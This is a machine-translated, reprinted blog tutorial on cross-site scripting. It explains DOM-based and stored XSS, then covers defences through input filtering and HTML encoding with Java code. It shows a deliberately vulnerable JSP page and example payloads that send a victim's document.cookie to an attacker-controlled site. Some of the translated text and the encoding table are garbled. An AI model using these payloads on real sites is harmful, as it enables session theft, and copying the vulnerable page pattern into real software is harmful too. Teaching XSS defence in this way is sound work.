Xss "Reprint"

Source: Internet
Author: User
Tags html encode sql injection attack

This article from: Gao | Coder, the original address: http://blog.csdn.net/ghsau/article/details/17027893, reprint please specify.
XSS, also known as CSS, the Universal cross-sitescript, multi-site scripting attacks, is a common vulnerability in web programs, XSS is passive and used for the client's attack mode, so it is easy to ignore its harmfulness. The principle is that an attacker would enter (pass in) malicious HTML code into a Web site with an XSS vulnerability, and the HTML code would be executed automatically when other users browsed the site for the purpose of the attack. For example, theft of user cookies, destruction of page structure, redirection to other websites, etc.

XSS attack

XSS attack is similar to SQL injection attack, we first found an XSS vulnerability in the Web site, XSS vulnerability is divided into two kinds, one is Dom Based XSS vulnerability, the other is a stored XSS vulnerability. Theoretically, there is an XSS vulnerability in which all input data is not processed, and the vulnerability depends on the power of the attack code, and the attack code is not limited to script.

DOM Based XSS

Dom Based XSS is an attack that is based on the structure of a Web page DOM, which is characterized by a minority of people in the Strokes.

Scenario One :

When I log in to a.com, I find that some content of its page is directly displayed according to a URL called content parameter, guess it is possible to test the page processing, other languages similar:

<%@ page  language= "java" contenttype= "text/html; Charset=utf-8 " pageencoding= " UTF-8 "%>

<! Doctypehtmlpublic "-//w3c//dtd HTML 4.01 transitional//en" "HTTP://WWW.W3.ORG/TR/HTML4/LOOSE.DTD";

<HTML>

&NBSP;&NBSP;&NBSP;&NBSP;<HEAD>

&NBSP;&NBSP;&NBSP;&NBSP;&NBSP;&NBSP;&NBSP;<TITLE>XSS test </title>

&NBSP;&NBSP;&NBSP;&NBSP;</HEAD>

&NBSP;&NBSP;&NBSP;&NBSP;<BODY>

       page content: <%=request.getparameter ("content")%>

&NBSP;&NBSP;&NBSP;&NBSP;</BODY>

I got it. Tom also registered the site, and know his e-mail (or other information to receive the contact), I made a hyperlink to him, the hyperlink address is: Http://www.a.com?content=<script>window.open ( "Www.b.com?param=" +document.cookie) </script> When Tom clicks on the link (assuming he's already signed in A.com), The browser will open B.Com directly, and Tom in a.com cookie information sent to b.com,b.com is I set up the website, when my website received this information, I stole Tom in a.com cookie information, cookie information may have login password, attack success! In the process, only Tom himself was the victim. That when I enter A.com?content=<script>alert ("XSS") </script> in the browser, the browser shows the contents of the page in the process of executing my script, the page output XSS Word, which is attacking myself, How do I attack others and make a profit?

Stored XSS

Stored XSS is a storage-type XSS vulnerability, because its attack code has been stored on the server or in the database, so the victim is a lot of people.

Scenario Two :

A.com can send articles, I log in a.com post an article, the article contains malicious code, <script>window.open ("www.b.com?param=" +document.cookie) </ Script> Save the article. When Tom and Jack saw my post, when they looked at my article, they all took, their cookie information was sent to my server, attack success! In this process, the victim is more than one person.
Stored XSS Vulnerability is more harmful, the harm surface is more extensive.

XSS Defense

We are in a contradictory world, with spears there are shields. As long as there is no vulnerability in our code, the attacker will not be possible, we will make an egg that is not sewn. XSS defense has the following methods.

Perfect filtration System

Never trust the user's input. The user's input needs to be processed, allowing only valid values to be entered, and all other values filtered out.

Html encode

If in some cases we cannot strictly filter user data, we also need to convert the tags.

less-than character (<)

greater-than character (>)

&GT;

ampersand character (&)

& Amp;amp;

double-quote character (")

& Amp;quot;

space character ()

&nbsp;

any ASCII code character whose code was Greater-than or equal to 0x80

&#<NUMBER>, where <number> is the ASCII character value .

For example, user input: <script>window.location.href= "http://www.baidu.com"; </script> after saving, the final storage will be: &lt;script &gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt; When presented, the browser converts these characters into text content instead of an executable code.

The other methods below provide two kinds of HTML encode.
    • Using Apache's Commons-lang.jar

      Stringescapeutils.escapehtml (str);//kanji will be converted to the corresponding ASCII code, space does not convert

  • Implement the conversion yourself, convert only part of the character

    private static String HtmlEncode (char c) {

    Switch (c) {

    Case ' & ':

    return"&amp;";

    Case ' < ':

    return"&lt;";

    Case ' > ':

    return"&gt;";

    Case ‘"‘:

    return"&quot;";

    Case ‘ ‘:

    return"&nbsp;";

    default:

    return C + "";

    }

    }

    /** Html encode conversion of incoming string str */

    Public Static String HtmlEncode (String str) {

    if   (str = =Null | | Str.trim (). Equals ("")) return str;

    StringBuilder Encodestrbuilder = new StringBuilder ();

    for (int i = 0, Len = str.length (); i < Len; i++) {

    Encodestrbuilder.append (htmlEncode(Str.charat (i)));

    }

    return encodestrbuilder.tostring ();

    }

(end) This article from: Gao | Coder, the original address: http://blog.csdn.net/ghsau/article/details/17027893, reprint please specify.

Xss "Reprint"

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.